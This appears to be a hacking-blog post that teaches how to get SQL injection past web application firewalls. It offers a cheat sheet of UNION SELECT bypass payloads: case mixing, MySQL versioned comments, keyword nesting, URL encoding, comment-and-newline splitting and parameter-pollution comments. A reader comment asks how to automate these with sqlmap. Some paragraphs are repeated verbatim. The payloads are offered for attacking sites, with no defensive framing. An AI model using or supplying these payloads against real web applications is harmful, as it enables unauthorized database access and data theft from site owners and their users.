WAF Bypass is for bypass 403 Forbidden. WAF stands for Web Application Firewall.
Look above image. We didn't successfully executed "union+select 1,2,3,4,5,6,7,8--".
Here we use advanced tricks in SQL injection. It is called WAF bypass.
Here one of the example of WAF Bypass,
"union(select 1,2,3,4,5,6,7,8)--"
Look above picture I have successfully executed SQL fuction.
"/*!Union*/ /*SelecT*/" -->[For the persons who know SQL understand it /*!comment syntax*/]
"UNIunionON+SELselectECT" -->[For Bypass firewall from remove of UNION SELECT from URL]
"%55nion %53elect" -->[%55=U and %53=S]
"%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT" -->[%23 = #, single line comment, and %0a = New line]
"/*&id=*/union/*&id=*/select/*&id=*/" -->[Unwanted Comments]
Look above image. We didn't successfully executed "union+select 1,2,3,4,5,6,7,8--".
Here we use advanced tricks in SQL injection. It is called WAF bypass.
Here one of the example of WAF Bypass,
"union(select 1,2,3,4,5,6,7,8)--"
Look above picture I have successfully executed SQL fuction.
Some Cheat Sheet for WAF Bypass on "UNION SELECT"
"UnioN SelecT" -->[Intermix of Capital and small letters]"/*!Union*/ /*SelecT*/" -->[For the persons who know SQL understand it /*!comment syntax*/]
"UNIunionON+SELselectECT" -->[For Bypass firewall from remove of UNION SELECT from URL]
"%55nion %53elect" -->[%55=U and %53=S]
"%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT" -->[%23 = #, single line comment, and %0a = New line]
"/*&id=*/union/*&id=*/select/*&id=*/" -->[Unwanted Comments]
2 comments
Write commentsi cant do that manually like this .Which tamper data who can do it using sqlmap ,mr ?
Replyplease help me ,thanks ..
Check here: http://www.terminalcoders.co.vu/search/label/Hacking
Reply